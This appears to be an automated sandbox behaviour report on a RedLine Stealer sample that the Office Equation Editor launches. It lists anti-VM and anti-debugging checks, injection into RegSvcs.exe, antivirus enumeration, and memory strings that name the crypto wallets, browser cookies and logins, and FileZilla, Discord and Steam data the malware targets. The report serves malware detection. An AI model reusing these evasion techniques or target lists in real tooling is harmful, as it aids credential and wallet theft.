                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeAPI/Special instruction interceptor: Address: 103224
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6248Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-102383
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeAPI coverage: 4.7 %
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2952Thread sleep time: -300000s >= -30000sJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3320Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008E4696 GetFileAttributesW,FindFirstFileW,FindClose,5_2_008E4696
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_008EC9C7
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008EC93C FindFirstFileW,FindClose,5_2_008EC93C
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_008EF200
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_008EF35D
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_008EF65E
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_008E3A2B
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_008E3D4E
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_008EBF27
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_00884AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00884AFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-999
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-1021
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-1006
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-1102
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-1063
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-1083
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeAPI call chain: ExitProcess graph end nodegraph_5-99593
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeAPI call chain: ExitProcess graph end nodegraph_5-99802
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeAPI call chain: ExitProcess graph end nodegraph_5-99913
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_001AABA1 LdrInitializeThunk,6_2_001AABA1
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008F41FD BlockInput,5_2_008F41FD
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_00883B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00883B4C
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008B5CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,5_2_008B5CCC
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_0099F090 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,5_2_0099F090
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005AC246 mov edx, dword ptr fs:[00000030h]2_2_005AC246
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_00103490 mov eax, dword ptr fs:[00000030h]5_2_00103490
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_001034F0 mov eax, dword ptr fs:[00000030h]5_2_001034F0
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_00101E70 mov eax, dword ptr fs:[00000030h]5_2_00101E70
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_008D81F7
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008AA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_008AA395
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008AA364 SetUnhandledExceptionFilter,5_2_008AA364
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008D8C93 LogonUserW,5_2_008D8C93
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_00883B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00883B4C
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_00884A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00884A35
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008E4EC9 mouse_event,5_2_008E4EC9
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\notorious53209.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\notorious53209.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008D81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_008D81F7
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008E4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_008E4C03
                    Source: notorious53209.exe, 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: notorious53209.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008A886B cpuid 5_2_008A886B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008B50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_008B50D7
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008C2230 GetUserNameW,5_2_008C2230
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_008B418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_008B418A
                    Source: C:\Users\user\AppData\Roaming\notorious53209.exeCode function: 5_2_00884AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00884AFE
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.notorious53209.exe.590000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.notorious53209.exe.590000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.387639158.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.387767388.0000000002400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: notorious53209.exe PID: 3092, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3116, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: notorious53209.exe, 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: p1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: notorious53209.exe, 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: notorious53209.exe, 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: notorious53209.exe, 00000005.00000002.358815022.0000000000590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: RegSvcs.exe, 00000006.00000002.387767388.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: p5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
